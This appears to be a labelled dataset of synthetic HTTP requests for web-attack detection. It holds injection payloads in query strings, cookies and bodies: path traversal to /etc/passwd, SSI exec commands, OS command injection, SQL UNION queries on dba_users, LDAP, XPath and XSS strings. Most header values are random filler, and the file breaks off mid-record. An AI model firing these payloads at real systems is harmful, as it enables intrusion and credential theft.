Accept-Language: si-no5bauin, ipetw-tp, ease-ze;q=0.3, 1aCiwE-altehce;q=0.5, bvsfttnt-lhpi5su
Cache-Control: no-store
Client-ip: 163.227.108.150
Cookie: otd=85266864;omdh=80;62iecs=ept1by6_y-v;mtbwi=mtum;wfiEov94ig8peka=o4e%~  yvn tbin
Cookie2: $Version="57"
Date: Sat, 19 Jan 08 18:45:51 UTC
ETag: "WyvG8K_AwpOUvCzMKd"
Expect: 100-continue
From: eoMt7@ridEmrif0e.it
If-Modified-Since: Mon, 04 Jun 07 24:52:15 UTC
If-Unmodified-Since: Sun, 14 Mar 04 19:05:37 GMT
If-Match: "@oljCu3qkH0hw6Qysqn-"
If-None-Match: *
If-Range: "UwI2G-4y1XRov01wDC"
Max-Forwards: 6
MIME-Version: 7.3
Pragma: robMf='esns'
Proxy-Authorization: NTLM ZWNnaGFuZm8xbXI0dGhlbnl3dGg5cnNhZThyaTZjZW5hcnNFYXJjVGRl
Authorization: Digest username="tezr"
Range: 77-,76-
Referer: /re9uHy24/horignO/aaen35o/oabsnio/stioh.cgi
TE: gzip;q=0.2
Trailer: Accept
User-Agent: Mozilla/5.1 (Windows; U; WinNT 5.4; ue-5h; rv:5.6.7) Gecko/26337839
UA-CPU: Sparc
UA-Disp: 119,1491,16
UA-OS: Win9x
UA-Color: color32
UA-Pixels: 5823x093
Via: FTP/4.4 www.teeLOto.js, 9.4 www.wdr1Nae.shtml
Transfer-Encoding: compress
Upgrade: he4tl/7.5, euo/6.5, etH/9.6, aci/2.2, oojhe/4.2
Warning: 825 116.151.251.79:4332 "d7aga7herbaA" 
X-Forwarded-For: 84.58.38.49
X-Serial-Number: 814494240740
----: --------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38066
Start - Id: 39045
class: LdapInjection
PUT /darc/JONTuoKRq.f/ecFhoEtmevaOeNEYt/NZCGaj@ECtH/e5VXyaT7Eaw/tges5ireee/Ire/ecrB7RwceXb5G/tedoyoe3ltkeAme36Z.nsf? HTTP/1.0
Content-Length: 246
Content-Language: oazeNEe,dt
Content-Encoding: compress
Content-MD5: dGxsYjU1N2ltNDRTdHNnYQ==
Content-Type: application/x-www-form-urlencoded
Last-Modified: Fri, 11 Feb 05 10:07:35 CET
Host: 37.160.251.189
Connection: keep-alive
Accept: text/plain;q=0.5
Accept-Charset: x-mac-chinesesimp;q=0.7, x-mac-cyrillic, gb2312, macintosh;q=0.4
Accept-Encoding: *
Accept-Language: st-sIadae;q=0.0, owfsM-spd;q=0.2, hsftaog-hAnBgt
Cache-Control: max-age=5
Cookie: wiieEeazente=dzx8E8G6i;hirhseaaipttAo=nedgnrrmodxhtebe;9497rNc6sae=n-5MFdM;opst2l=>cglo;LWDdBsvrYfu=nuQ52cL
Date: Sun, 28 Dec 08 15:34:05 GMT
Expect: ohnrIS=4hanah
If-Unmodified-Since: Sun, 10 Aug 08 15:04:55 CET
If-Match: *
If-None-Match: *
If-Range: "-Gt5NG.BxIijq6uns0HS"
Max-Forwards: 19
Pragma: no-cache
Referer: /festteLU/piEnn/ot03cc/q2iikewl/zuP6.png
TE: deflate;q=0.9,gzip;q=0.4,trailers
Trailer: Referer
User-Agent: )   (|  (displayName=had*)  (name  =  had*  )(   mail=had*)
Via: 0.5 225.106.206.14, l6oEi/6.8 www.sHeRwgnu.tiff, mukse/6.9 174.32.90.51:81
Transfer-Encoding: compress
Upgrade: Are/6.6, yyhe4a/3.0, 7eytto/3.0, joo2/5.9
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

riiicUjetned3f=redocumentllneeeFi7Sgh3fta|&7naotMcojn=81r3wHRc&ce=ge=u&adAaxnyjnd5ow0=opttiframeii&d5iooer=telnetaest&aiaNleawm5bfuit=89015&ecrypahgrets=nnI4yMm&3VvTB3fromC=passwdo&LVkENimg3=lDl3Aorcpre7vr&opueias8O=6714218693&2rrqo4onae=4641

End - Id: 39045
Start - Id: 46325
class: PathTransversal
GET /8uxiqrikislee/aTnfLDrrMND2yUBTfaY/9rmbAvypWN.mspx?dns4=pv-Q03i&etiaE68eaiqokr=394&pqdirutnhee=e&7GY2KbR=784876&rde2E=n3e&ss9=%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2Fetc%5C%2Fpasswd%2500.html&tvu=eidcpmochayteontgsd HTTP/1.1
Host: 145.233.102.4
Connection: keep-alive
Accept: */*
Accept-Charset: x-mac-greek;q=0.4
Accept-Encoding: identity;q=0.8, gzip, deflate
Accept-Language: *;q=0.9
Cache-Control: min-fresh=632
Client-ip: 146.96.8.202
Cookie: tcnoth1LAdbjda=smis:@eaNeUo;hojadsc6ey=iI0zib;YzrVWxmochadelete3yx=gIr;eCxY9dsystemrG=8YEj;zmdrsE2erqma2=qt9;seidhsdhr3a=2457
Cookie2: $Version="67"
Date: Fri, 03 Feb 06 12:58:03 GMT
ETag: "A4n@WphrfP3Od4@lx"
Expect: 100-continue
From: sgtDwB@5isge.ch
If-Modified-Since: Sat, 30 Apr 05 17:27:34 GMT
If-Unmodified-Since: Fri, 13 Jul 07 21:15:53 GMT
If-Match: "1swgFq-Ny_tsuC94bX"
If-None-Match: *
If-Range: "fz9QG58-gNcQaz05w7oC"
Max-Forwards: 382
MIME-Version: 6.3
Pragma: idnoier='4fo2ls'
Proxy-Authorization: Digest nc=54AeEe7f
Authorization: Basic bW5oaTpTaDU5ZzRn
Range: 595-7160,98-,4-961
Referer: /a1grxs/tesq/ueset/emk9.asmx
TE: trailers,trailers,trailers
Trailer: Via
User-Agent: Mozilla/4.6 (X11; U; Open BSD i386 3.9; df-wf; rv:5.1.8) Gecko/01219757
UA-CPU: Sparc
UA-Disp: 0890,6289,8
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 434x579
Via: 0.0 192.88.127.73:57521, 0.9 www.wonhina4.png
Transfer-Encoding: compress
Upgrade: Dnh/3.3, iienNa/1.0, khpjt/2.7, ote6v4/0.0
Warning: 494 178.239.117.244 "Abhgtrgfsota" "Tue, 21 Mar 06 06:42:46 CET"
X-Forwarded-For: 84.224.165.18
X-Serial-Number: 5744439401
----: --------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 46325
Start - Id: 36243
class: PathTransversal
GET /tIrtoGD6@id2Sv7DA_aW/tltd/saro5j/1ugf9Oubwn/20M9oQD/k@Gt_X.cgi?cPaph=sQ4qE&nie=voa8nooed8hesieq&0nOt2ythdae=os&npem7id1ihBem=7 HTTP/1.1
Host: 171.120.194.215
Connection: stAp
Accept: text/plain
Accept-Charset: *
Accept-Encoding: *;q=0.0
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 225.247.115.28
Cookie: EddRbraaIsahaka=/,,,/naWnI2/yb/passwd
Cookie2: $Version="215"
Date: Thu, 17 Aug 06 13:19:30 UTC
ETag: "yGLU4hgQ2Im7nF9qp0"
Expect: 100-continue
From: R8ey4uts@hpirwthtem.st
If-Modified-Since: Tue, 06 Jan 04 20:47:10 UTC
If-Unmodified-Since: Mon, 09 Mar 09 21:28:22 GMT
If-Match: "jQCfLfmByH9fn2bZP"
If-None-Match: *
If-Range: *
Max-Forwards: 581
MIME-Version: 0.2
Pragma: no-cache
Proxy-Authorization: Aial 1orsag=amhch
Authorization: Digest cnonce="tmttoroI"
Range: 3-,-926
Referer: /pPtta/oPrnfk4l.wav
TE: chunked
Trailer: Cache-Control
User-Agent: nsiSRon (1oZJbPMA6L)
Transfer-Encoding: deflate
Warning: 692 38.72.57.159 "manchyecbhna5e" 
X-Serial-Number: 642760549

null

End - Id: 36243
Start - Id: 37608
class: LdapInjection
PUT /-_TDkPRwFEhavingIxp_/d8kEw/iYpFpTU249tewo0d@2/gl1aenG.exe? HTTP/1.0
Content-Length: 76
Content-Language: rt,i,7gyhm4t
Content-Encoding: deflate
Content-Location: /ainrleh/rslSoos/eakN.fgf
Content-MD5: cFNsbDZob2V0bmx1a3RvRQ==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 27 Jun 06 11:25:41 GMT
Last-Modified: Wed, 08 Mar 06 06:21:26 GMT
Host: www.p5iy.biz
Connection: close
Accept: */*;q=0.8
Accept-Charset: x-mac-roman;q=0.6, iso-2022-kr, x-mac-icelandic;q=0.1
Accept-Encoding: deflate, deflate;q=0.4
Accept-Language: ires9Gih-eelazs, shbQ-ea4hht
Cache-Control: no-transform
Client-ip: 128.229.228.86
Cookie: ze9BlocationZ=732496;9etha9stahwo9=eandhpg;.ByWM_eEdelete=Sde;iamJsi8ePtC7N=libde]ei ohssg/p\e
Cookie2: $Version="1"
Date: Sun, 26 Dec 04 07:02:43 UTC
ETag: "@QX@_ywUL101QKMd"
Expect: atOn8lmw=quhao
From: shqwscZ@htnl9xec.gov
If-Modified-Since: Fri, 20 Oct 06 23:52:02 CET
If-Unmodified-Since: Sat, 17 Jun 06 06:52:12 CET
If-Match: "EgyXQ@o0ERvqenLlYv7N"
If-None-Match: *
If-Range: "bKzjmmSku3m81rjF"
Max-Forwards: 5
MIME-Version: 8.8
Pragma: no-cache
Proxy-Authorization: wCwbd1 E1saai=4olnf
Authorization: NTLM U2lidUV0ZW52c2tlc2hpcGlwZG5uYW51OXNvbE9sdWNlaTFkenNoZDhqdGVpSQ==
Range: 5-,297-087
Referer: http://www.aeas.ch/ReiyhhdL/ha8e6eui/thr8/daLmNI.mdb
TE: trailers
Trailer: Accept-Language
User-Agent: Mozilla/6.6 (Machintosh; U; PPC 6.3; lr-os; rv:2.7.8) Gecko/94464531
UA-CPU: PowerPC
UA-Disp: 2548,1743,32
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 770x317
Via: HTTP/0.8 119.213.14.150, 1.5 www.eodt.html:0569
Transfer-Encoding: deflate
Upgrade: roOt/4.0, lDulw/0.4, tsto/6.6, teepwe/5.4, uyq/3.7
Warning: 884 75.45.43.166 "cemm8l" "Sun, 10 Jul 05 20:22:37 CET"
X-Forwarded-For: 20.191.23.124
X-Serial-Number: 35061677814454
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~

ngs=9257045812&goS5affmfs=e2ce)(    |  (psi=*)&eamisnhsabnia=um6

End - Id: 37608
Start - Id: 47241
class: XSS
GET /ildRaORVUhJ5M/t5J_Yij0@WHEzviRYX3R/teue6hNatoote/8MHtv0yhcescedvntQNn/7s4dtjvw8eep/d0eaf/rqderIatiedjN.html?orulciaj6iua=%3Cdiv+++++style+%3D++++%22binding%3A+url%28%5Bhttp%3A%2F%2Fwww.as.com%2Fscript%2F9bn4.asmx%5D%29%3B+++++%22%3E HTTP/1.1
Host: 188.237.187.53:1
Connection: BEaWb
Accept: video/*, audio/x-wav;q=0.2
Accept-Charset: windows-1254, x-mac-turkish;q=0.6, x-mac-chinesesimp;q=0.3, euc-kr, iso-8859-8;q=0.5
Accept-Encoding: *
Accept-Language: y-on8tx, ieneE-e0het4ga;q=0.5, xn-rKvtergp, 8g0-asrsY;q=0.4
Cache-Control: only-if-cached
Client-ip: 100.78.98.252
Cookie: Heiooc=iscC8;td4rlosmhrrznq=otUq@sAUI;caom=30;5wp-.Cd=01;Uptenojr=uAqLKC0cujn
Cookie2: $Version="66"
Date: Mon, 17 Oct 05 12:25:16 CET
ETag: "5vTe1bZxzLc.pyDKOkp."
Expect: 100-continue
From: npuaaot@jotm34.net
If-Modified-Since: Sun, 04 Apr 10 03:26:15 GMT
If-Unmodified-Since: Wed, 20 Oct 04 16:03:54 UTC
If-Match: *
If-None-Match: "Z4LV9FHYLJ8Svn8ND"
If-Range: *
Max-Forwards: 619
MIME-Version: 8.0
Pragma: Rrohe=sortdt1h
Proxy-Authorization: 6ndit medexEq=belmLsj
Authorization: Digest uri=/wseovhc/h9OWo.nsf
Range: -3
Referer: http://www.sonh.de/jiml/8fcCrsms/dqS9io.avi
TE: trailers,trailers,gzip
Trailer: Max-Forwards
User-Agent: Mozilla/2.1 (Windows; U; Win 9x 1.4; hT-0a; rv:3.8.5) Gecko/86991469
UA-CPU: Sparc
UA-Disp: 390,072,32
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 077x3740
Via: HTTP/4.8 www.1rmIlfe.js, HTTP/0.9 www.q03r.js:8, 2aae/0.4 www.wao7.tiff
Transfer-Encoding: identity
Upgrade: ebpgud/5.5, uo6ys/3.0, eeei/3.0, wOU/7.9
Warning: 011 www.oca0haoj.js:3920 "uneuy500c" 
X-Forwarded-For: 230.35.184.69
X-Serial-Number: 81818061997454
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47241
Start - Id: 47750
class: XSS
GET /dLtsrctr8tsenncrbx/rm4nvb7fv8THPsmlD/-0/bRmW@4WUwTDcXZWyWDa/l6NPZFK.FcbRPk/eddh14isnyeo/eZXniVVsRpCHAQJWI/4J8aO0lEl/sh1fJE@xPaK3-E/sC.yKYihMu/luersui5numefetba.exe?Afcwtssb=%3Cimg+++dynsrc+%3D+++%22++javascript%3A+%5Balert++++%28%27afu0cl%27%29%3B%5D+%22++++%3E&rcaw2hdiei=oQN%25sf&Chmuz=8 HTTP/1.1
Host: 152.94.235.59:140
Connection: oaEnOA
Accept: */*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: a7yt-9, mSsb-B
Cache-Control: no-cache
Client-ip: 72.188.119.217
Cookie: eerbneUse=)asse7union2m
Cookie2: $Version="00"
Date: Mon, 07 Nov 05 03:06:00 UTC
ETag: "7talGQPBsmJ_AaAgn"
Expect: 100-continue
From: timd@onRl.biz
If-Modified-Since: Tue, 29 Jun 04 16:36:17 UTC
If-Unmodified-Since: Sun, 02 Jul 06 16:53:25 GMT
If-Match: *
If-None-Match: "Q5rXo6GZfPhYCz9js"
If-Range: Mon, 29 Jun 09 04:58:41 CET
Max-Forwards: 4
MIME-Version: 7.7
Pragma: stt6=4aNi
Proxy-Authorization: Basic b3Q3YXlzZm06ZHZjaG5m
Authorization: Digest nonce
Range: -887125,6715-3229
Referer: http://rnyqsl.org/teyh/trCllsR/i9maif/rimtnc.asp
TE: trailers
Trailer: Date
User-Agent: iprrtsoD/0.9.7.7.3
UA-CPU: 68000
UA-Disp: 746,0945,16
UA-OS: Win98
UA-Color: color32
UA-Pixels: 0710x100
Via: 9.4 92.11.81.124
Transfer-Encoding: deflate
Upgrade: sji/4.0, asq/5.9, arzh/5.3
Warning: 007 99.146.164.232:6 "uilesuwut6rpu" "Thu, 10 Feb 05 15:43:00 CET"
X-Forwarded-For: 198.120.124.208
X-Serial-Number: 75850540029155
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47750
Start - Id: 50082
class: XPathInjection
PUT /mxCFipW@-h/mailMLt8/f4qd7/a81RHlm/b0hvt._3oWiQYuCv2/aa7dseenn.shtml? HTTP/1.1
Content-Length: 135
Content-Language: Caioenko
Content-Encoding: compress
Content-Location: /dsca.tiff
Content-MD5: bG10aG5MbGVlY25paXNvbg==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 25 Aug 07 07:51:00 CET
Last-Modified: Fri, 24 Dec 04 08:25:20 CET
Host: www.tegee.gov
Connection: close
Accept: video/quicktime, text/*, text/*;q=0.1
Accept-Charset: *;q=0.6
Accept-Encoding: 
Accept-Language: *;q=0.4
Cache-Control: max-age=04917
Client-ip: 82.164.87.92
Cookie: gbIOPfp=47odesuhtwFhe;eLfgact5fveaeh=8toqqhte;T;xaSedmn=Aihl'   or path/child::node()[position()=N]  or  'sibnt'    =';5LehspEnJydu=93075;O3MFbin9=Acataa/
Cookie2: $Version="1"
Date: Thu, 10 Apr 08 14:00:32 CET
ETag: W/"7KYCLRxNra1b_I9g3"
Expect: rze9eY=cE9r0;eoair=a0tct2
From: a2ahor@ihbawa.net
If-Modified-Since: Tue, 16 Feb 10 22:47:17 UTC
If-Unmodified-Since: Fri, 15 Feb 08 20:35:08 CET
If-Match: "ZBrGI0pysbAqVMq"
If-None-Match: "hOv3T6eJD@nVv7xsn455"
If-Range: "goSVZVVUfu4ID2VF36Mf"
Max-Forwards: 5721
MIME-Version: 1.2
Pragma: no-cache
Proxy-Authorization: NTLM ZW9zdXFPM1lvdGU0ZmV0amlzc0ViaXRkYXRFZXRuYW50dHNsdUVzTXM=
Authorization: Digest qop=oxos
Range: -26285,855-62326,6925-
Referer: /rurS8a/oufS/hMoh.css
TE: deflate;q=0.1,trailers
Trailer: Transfer-Encoding
User-Agent: oywm/9.6.3
UA-Disp: 7776,400,32
UA-OS: Solaris
UA-Color: color16
Via: 5.5 53.185.53.73
Transfer-Encoding: gzip
Upgrade: HiS/8.4
Warning: 655 8.146.131.14 "dxoce5aih3rnnfYua" "Tue, 17 Oct 06 23:28:47 GMT"
X-Forwarded-For: 111.165.36.41
X-Serial-Number: 254807
----: ---------------
~~~~~: ~~~~~~~~~~

eheTlem7s=SdhAdlPtgO&QdaUx8Fgroup byIO==&eftro=dijDsrsOqee&rssoegeoa=90720&3ROiCgroup bydexecP9N=77&itbt8bao=Rmwno3&f0nemN=aesihBonAs

End - Id: 50082
Start - Id: 49604
class: XPathInjection
GET /0@5Ws2BJ8aJNeA6kD/t61D12syHCZa-4Tev591/ePB7z35rQapA.asmx?enuan=sB%40HooPgV&6t=0Wl&lavnadujaywpoa=aautoexecTutphsock_streamuebo2%3A&jaasp3ieiefqz=405780&acraiotrne9=++1%3A%7Ctperl&iSrefy=h+nc&aymsReten=hs&DZXMd=7ne%24t&trppied=0&isrvhc=8835806029&oedlsimoiuma=94734&xuennioezRt=9&@catH0bin9WEFt=tH%27++++or+++count%28++path%2Fchild%3A%3Anode%28%29%5Bposition%28++++%29%3D%28%28+++i%2B++++j++%2B++++k++++%2B+++l+++%2B+++1%29%5D++++%7C++path%2Fchild%3A%3A*%28%29%5Bposition%28%29%3D%28k%2B1%29%5D%29%3D1++++or++%27whyvyhEo%27+++%3D++%27+++en%27++++or&hueaA0upOtiW=naztios71o%7CYn HTTP/1.1
Host: 255.102.225.87
Connection: eoNrh
Accept: */*
Accept-Charset: iso-8859-15, windows-874;q=0.1, windows-1257
Accept-Encoding: *
Accept-Language: ewnnnnb-hawntae, ta6-i;q=0.8, x8eenbof-ctsulP;q=0.4, he-etaynw;q=0.5
Cache-Control: min-fresh=67
Client-ip: 227.68.153.68
Cookie: telnetOZx='aite;Q@Kg=76;oyj-mSy9POu=nhlseNn'iHutao
Cookie2: $Version="97"
Date: Wed, 22 Nov 06 03:33:23 UTC
ETag: "OmYn45rY5Z5qYtyD0"
Expect: 100-continue
From: tdaOt@esEtnmNs.it
If-Modified-Since: Fri, 09 Nov 07 03:06:27 GMT
If-Unmodified-Since: Mon, 25 Aug 08 17:06:42 CET
If-Match: "eHujKSEypHPDUITto0m@"
If-None-Match: "9pggvc4YLE85.tCAZzy5"
If-Range: Tue, 05 Oct 04 05:56:11 UTC
Max-Forwards: 49
MIME-Version: 0.8
Pragma: x=e6
Proxy-Authorization: Hsia5 4xaft=eores4
Authorization: Digest uri=/rreszL5t/vca8O8/mriOJfT/shqsigjb/ne5etolo.mp3
Range: 7852-
Referer: /we3ee/AtrtrtEq.png
TE: chunked,trailers,deflate
Trailer: Via
User-Agent: Mozilla/1.6 (X11; U; Open BSD i586 1.6; t0-rz; rv:0.2.6) Gecko/51795142
UA-CPU: 68000
UA-Disp: 1997,806,16
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 3223x940
Via: baa1iu/3.2 www.cewhy.gif:6874
Transfer-Encoding: teeth; aohrR1ca=tdssarr
Upgrade: add/2.5
Warning: 760 227.98.126.37 "nIw39hepCclatnett8" "Tue, 06 Nov 07 04:36:32 GMT"
X-Forwarded-For: 94.116.73.204
X-Serial-Number: 9696710
----: -----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49604
Start - Id: 44613
class: OsCommanding
GET /Dnx8IdFFz_IhtG/hrti/nK7vXcv77akLwI.pq/eekOTNqL6pAY8Cs/tOxdgoKM/eaoauOpaWae1ohactjve/io.GkN/k9zaseI1DnOoUo/vK8xJ.3R/arr/td9dq9kW4.png?oeh4jtuoGiy=mZwlYHkl7-&mialos=lmochah8uer%40+e&ntuannn=echom1tNl&sTxltenretE=e%28d++&sricv=m%40Ecoescriptd%3B&t8eecsmtssdKn=ha.&LRPC=861460&dedhs1Ssnmrtz5c=168.227.76.249+%7C++echo+%22test%22+%3Eevilfile.txt&fp=9rtWainpfE&Pril5insh=setnr HTTP/1.1
Host: 123.160.72.170
Connection: close
Accept: image/gif;q=0.1, audio/*;q=0.8, audio/*
Accept-Charset: iso-8859-7;q=0.9, windows-1252;q=0.9
Accept-Encoding: gzip;q=0.8, compress;q=0.7, gzip;q=0.1, gzip
Accept-Language: *;q=0.5
Cache-Control: max-stale
Client-ip: 69.114.91.22
Cookie: -AQYMis=ieioHnlh;ae=t6diezttk--child;bnet= 
Cookie2: $Version="4"
Date: Tue, 11 Jan 05 01:49:32 GMT
ETag: W/"s5g6qnsYgtokpr41lg"
Expect: sics3mi=5hos2;rStOaann
From: yrtaag@x3hp5xn5i.net
If-Modified-Since: Tue, 19 Jun 07 17:48:55 CET
If-Unmodified-Since: Thu, 05 Oct 06 12:29:28 UTC
If-Match: "JUf9cCc.LZTIJK58Vc"
If-None-Match: *
If-Range: Sun, 09 Apr 06 08:33:41 CET
Max-Forwards: 27
MIME-Version: 1.7
Pragma: 5cera=kee
Proxy-Authorization: ozleh5 vvuEC=0hotw
Authorization: Digest response="bcBA5C86dA8FD934F8fC0b716E978acc"
Range: 6245-9,4665-34,-76
Referer: http://lhU2.de/tc96/hiMhbatE/ijouea/ukEml8Il/wellcz.ace
TE: trailers,trailers
Trailer: Host
User-Agent: Mozilla/1.6 (Machintosh; U; PPC 4.6; iH-uw; rv:9.5.2) Gecko/65811850
UA-Disp: 0488,6492,16
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 494x0584
Via: HTTP/5.3 188.64.121.58
Transfer-Encoding: gzip
Upgrade: oTe/6.3, en2/3.5, hq1ltn/9.0, 9elp1/2.1, Esotly/2.0
Warning: 294 www.eeugeo2c.png "bVo5d8oDShGrt1n" 
X-Forwarded-For: 117.132.107.47
X-Serial-Number: 92326230406152
----: ------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44613
Start - Id: 35262
class: SqlInjection
GET /0dHnibe8/seoy5ofwiwedu/5teasIeositfeostr0/cmdq5LFchoqkt/aceutnis/hediistofida/nrKDoLitOisSxP6bRi/amg8X/emailUAO6TmTeZL1W6/cssthb6mibaLwa/tN/aKSUvjQbzF6zJf.php3?ale=iwDK8okvQI&gic=855706&CbingZFtmpvpyGm=0&ha9=ahltin%28&TehTDinfemsl=rtqsVhmelaxoai&ps=ey%27+UNION++++%2F**%2F++SELECT++++mAa9ca++FROM+dba_users++++WHERE+++0eo+++++like++%27%2525&Ds=adtgh9arruoEtaa4u&nokad=nx75%40NxW HTTP/1.0
Host: www.DrenDond.ch
Connection: keep-alive
Accept: image/png, video/mpeg, image/png
Accept-Charset: *
Accept-Encoding: *;q=0.6
Accept-Language: kcsm3o-En2dT, lxT-si8nweat
Cache-Control: only-if-cached
Client-ip: 109.198.163.157
Cookie: nvo=3arn;wtrmeueei=hks
Cookie2: $Version="7"
Date: Sun, 18 May 08 22:39:14 CET
ETag: W/"zHiODFuPs6qvu1P65@"
Expect: er37ac=rtaefe;celo
From: ieogO97c@1xtO.uk
If-Modified-Since: Wed, 07 Sep 05 04:20:40 UTC
If-Unmodified-Since: Thu, 02 Feb 06 10:15:43 GMT
If-Match: *
If-None-Match: "b5Iin6Q.3RF3p.tS1"
If-Range: Thu, 01 Dec 05 14:56:45 CET
Max-Forwards: 96
MIME-Version: 3.3
Pragma: no-cache
Proxy-Authorization: 8eEcs dejCatel=tunerro
Authorization: a6br lfuumh=lyan
Range: 716-,83323-
Referer: /iNszhnl/Ymyt/uvtazsz5.wmn
TE: chunked
Trailer: Referer
User-Agent: 2oteeontdm (0Z_UyBXab; 7UUyt5Cp; evzuR19cU; mH-VV5f; iT7kg_)
UA-CPU: StrongARM
UA-Disp: 420,4746,32
UA-OS: Linux
UA-Color: color8
UA-Pixels: 7179x0700
Via: wage9l/2.5 3.65.189.140, HTTP/8.9 www.iiaehtia.js, HTTP/0.7 180.7.214.179
Transfer-Encoding: compress
Upgrade: I8j/1.5, gc9ecr/7.1
Warning: 900 139.60.79.76 "ln9aeaneieNgnh6Hl" "Mon, 29 Jan 07 22:28:50 GMT"
X-Forwarded-For: 149.48.124.188
X-Serial-Number: 086505531477
----: ------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35262
Start - Id: 40134
class: SSI
GET /redxspioel6ttLstbs/s6gqq1mHEakcy/we8Y5reUb-TvCzOczrQ.htm?asoH=uOMJtrH9&9uBmJZ6f7lib=wn2h&wgthsot=89798575&i0sykrtt1ly=iobni%27&tln1beeceitLe0=%3C%21--+++%23exec++cmd%3D%22%2Fbin%2Fls+-l++%2Fhome%2FcTtmypgad%2Faiet%22++--%3E HTTP/1.0
Host: www.Nsia2it.st
Connection: close
Accept: */*;q=0.3
Accept-Charset: x-mac-arabic
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-transform
Client-ip: 246.182.239.2
Cookie: pssrusateU4=yirvbscripts;Meeobat=;p;6JaWexecMRpasswdsystempassthru=olibn;7EnkoLSeto=114522;bXF3xp_=ecmdm4ec'so;bamk3=45
Cookie2: $Version="8"
Date: Wed, 20 Jan 10 16:52:03 GMT
ETag: "b8V1OvziTD4X0YaPC"
Expect: eyrbrtI
From: PtrtE@h2sisrnd.gov
If-Modified-Since: Tue, 02 Nov 04 16:29:49 CET
If-Unmodified-Since: Mon, 08 Aug 05 07:18:48 UTC
If-Match: *
If-None-Match: "epZvrM3VuYc5TvvgPQQC"
If-Range: "peaBNeIxgmeh631w"
Max-Forwards: 2743
MIME-Version: 8.1
Pragma: vk=ioaa
Proxy-Authorization: Basic b290UzpiY3R6
Authorization: NTLM b2xydG9uY3NuZGNDZXVObGE2bndpcnJ3aHRldHpkbUVlaXRzaWVp
Range: 86-29827,480182-539278,773981-8539
Referer: http://eeetdo.org/lPmnf4tt/rpQUwmc/aohs.gif
TE: chunked;q=0.7,chunked;q=0.4,trailers
User-Agent: Mozilla/6.0 (X11; U; Linux i586 2.2; os-rt; rv:3.6.1) Gecko/12883091
UA-Disp: 5908,939,32
UA-Color: color32
UA-Pixels: 844x123
Transfer-Encoding: identity
Warning: 305 53.141.60.13 "ymreiTeeg1dos2e" "Sun, 14 Oct 07 07:03:33 CET"
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 40134
Start - Id: 42419
class: SqlInjection
GET /eCR90-AB4SMtQa0.X8K4/hAY-uYaJcoNSUhqgS/lpHmywveautoexec/z9cwinmBYB79V/gywjAM.mNP5NzqH1K3mM/5reip/dhF/rdli.tiff?hhc4esevtepesM=riiframelcnestsryshr&uUthudw3po=33&iqosealxnngaa=OR++%27LLd%27+IN++++%28++++%27++++%27+%29&hnosoiajeAdqTl=e-W6%40 HTTP/1.1
Host: www.Hboiq.com
Connection: RlRsu
Accept: */*;q=0.6
Accept-Charset: iso-8859-1;q=0.9, euc-kr, euc-tw
Accept-Encoding: *;q=0.3
Accept-Language: GthlR-atesei, 45orrtei-esweO7n;q=0.4, Ob-fn;q=0.2
Cache-Control: min-fresh=2156
Client-ip: 179.176.205.80
Cookie: jos=ft2oe9;donkorTeivignr=ix=;mI=fxa
Cookie2: $Version="0"
Date: Thu, 21 May 09 14:27:47 UTC
ETag: "ihNWxKiFaZe3DCw"
Expect: 100-continue
From: Tm9x@je4xi.it
If-Modified-Since: Tue, 30 Sep 08 09:05:02 CET
If-Unmodified-Since: Sat, 22 Jan 05 03:13:20 GMT
If-Match: "@EJevUhPQGIBaIKZjB"
If-None-Match: "pNN1.vyaxQzf9kZ"
If-Range: Thu, 12 Jul 07 13:56:14 UTC
Max-Forwards: 6127
MIME-Version: 7.6
Pragma: rce='tesewoL'
Proxy-Authorization: Basic YWV0ZWJwdzplbHdOZm1lcg==
Authorization: NTLM V2hvOXR0dG5uRmF3ZEVhbzllbTF0c1VrZXZpaGk2bklaOGVYVWl3ZW9jZlBk
Range: 005696-6624,4-
Referer: /seoX9nle/aeew4t7u/lrsIn/npc8l.cfm
TE: trailers
Trailer: Trailer
User-Agent: Mozilla/3.1 (Windows; U; Windows NT 9.1; ea-nn; rv:4.0.5) Gecko/78190135
UA-CPU: 68000
UA-Disp: 4009,500,16
UA-OS: Linux
UA-Color: color8
UA-Pixels: 189x646
Via: HTTP/8.3 www.aiina.png, HTTP/7.8 www.rttAhry.gif, FTP/4.0 168.112.34.200
Transfer-Encoding: compress
Upgrade: 3w4vo/5.2, oee9/2.0, ot6Q/5.5, ergojg/6.9, u2osoe/4.9
Warning: 520 206.128.137.82 "k8cmwoU" "Thu, 21 Jul 05 08:42:03 UTC"
X-Forwarded-For: 120.46.59.231
X-Serial-Number: 2317427
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42419
Start - Id: 41865
class: SqlInjection
